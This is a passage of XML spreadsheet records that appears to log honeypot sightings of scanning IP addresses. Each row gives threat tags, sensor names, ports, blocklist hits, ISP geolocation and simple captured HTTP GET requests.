    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cc:1457"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3538"/>
    <x v="3538"/>
    <s v="114-35-174-39.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T15:02:08"/>
    <d v="2024-07-08T13:28:00"/>
    <d v="2025-04-02T15:02:08"/>
    <n v="474"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H39&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;23&amp;&amp;37883"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET: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7223:ae27"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3539"/>
    <x v="3539"/>
    <s v="220-132-194-158.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T14:59:18"/>
    <d v="2024-05-04T10:22:00"/>
    <d v="2025-04-02T14:59:18"/>
    <n v="712"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;35882&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;42518"/>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GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:c29e"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3540"/>
    <x v="3540"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T14:46:31"/>
    <d v="2025-04-02T14:46:31"/>
    <d v="2025-04-02T14:46:31"/>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e:8271"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3541"/>
    <x v="3541"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T14:39:51"/>
    <d v="2025-04-02T14:39:51"/>
    <d v="2025-04-02T14:39:51"/>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e:3c67"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3542"/>
    <x v="3542"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T14:38:02"/>
    <d v="2025-04-02T14:36:00"/>
    <d v="2025-04-02T14:38:02"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="17917"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="Hfcl Infotel LTD"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1bff:e1bb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3543"/>
    <x v="3543"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T14:29:22"/>
    <d v="2025-04-02T14:27:16"/>
    <d v="2025-04-02T14:29:22"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="BR"/>
    <s v="Bihar"/>
    <s v="Begusarai"/>
    <s v="Begusarai"/>
    <s v="1276609"/>
    <s v="NA"/>
    <s v="25.4185"/>
    <s v="86.1339"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="RELIANCEJIO"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:983b:aa77"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3544"/>
    <x v="3544"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T14:22:16"/>
    <d v="2025-04-02T14:21:14"/>
    <d v="2025-04-02T14:22:16"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="AC"/>
    <s v="Aceh"/>
    <s v="Pidie Jaya Regency"/>
    <s v="Lueng Putu"/>
    <s v="6699784"/>
    <s v="NA"/>
    <s v="5.25724"/>
    <s v="96.0649"/>
    <s v="141672"/>
    <s v="PT Nuansa Online Mitrakom"/>
    <s v="PT Nuansa Online Mitrakom"/>
    <s v="business"/>
    <s v="Nuansaaceh"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6743:3154"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3545"/>
    <x v="3545"/>
    <s v="122-117-124-137.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T14:05:58"/>
    <d v="2024-02-11T18:27:00"/>
    <d v="2025-04-02T14:05:58"/>
    <n v="6323"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_PJL_H13&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_NTP_H28&amp;&amp;SMA-LAB_HTTP_H15&amp;&amp;SMA-LAB_DNS_H37&amp;&amp;SMA-LAB_SSH_H28&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;389&amp;&amp;9100&amp;&amp;5900&amp;&amp;123&amp;&amp;80&amp;&amp;53&amp;&amp;22&amp;&amp;4384&amp;&amp;23&amp;&amp;NA"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:7c89"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3546"/>
    <x v="3546"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T13:54:35"/>
    <d v="2025-04-02T06:41:56"/>
    <d v="2025-04-02T13:54:35"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="MTNL Mumbai"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:bd79"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3547"/>
    <x v="3547"/>
    <s v="NA&amp;&amp;220-135-101-92.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T13:53:40"/>
    <d v="2024-05-08T20:37:00"/>
    <d v="2025-04-02T13:53:40"/>
    <n v="1577"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;14294&amp;&amp;23&amp;&amp;37926&amp;&amp;37986&amp;&amp;38062&amp;&amp;38096&amp;&amp;37958&amp;&amp;38142&amp;&amp;9100&amp;&amp;80"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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dc87:655c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3548"/>
    <x v="3548"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T13:52:30"/>
    <d v="2025-04-02T04:55:32"/>
    <d v="2025-04-02T13:52:30"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="Multiplay-Prepaid"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:4e64"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3549"/>
    <x v="3549"/>
    <s v="220-135-83-34.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T13:41:50"/>
    <d v="2023-07-24T16:05:41"/>
    <d v="2025-04-02T13:41:50"/>
    <n v="1622"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_VNC_H43&amp;&amp;SMA-LAB_HTTP_H31&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;22&amp;&amp;445&amp;&amp;389&amp;&amp;5900&amp;&amp;80&amp;&amp;13201&amp;&amp;23&amp;&amp;41838&amp;&amp;NA&amp;&amp;9100"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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dc87:5322"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3550"/>
    <x v="3550"/>
    <s v="122-116-21-91.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T13:41:43"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-02T13:41:43"/>
    <n v="788"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_DNS_H18&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;17340&amp;&amp;80&amp;&amp;53&amp;&amp;52473&amp;&amp;23&amp;&amp;53360&amp;&amp;53347&amp;&amp;9100&amp;&amp;NA&amp;&amp;24809&amp;&amp;35561&amp;&amp;35546&amp;&amp;35577"/>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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
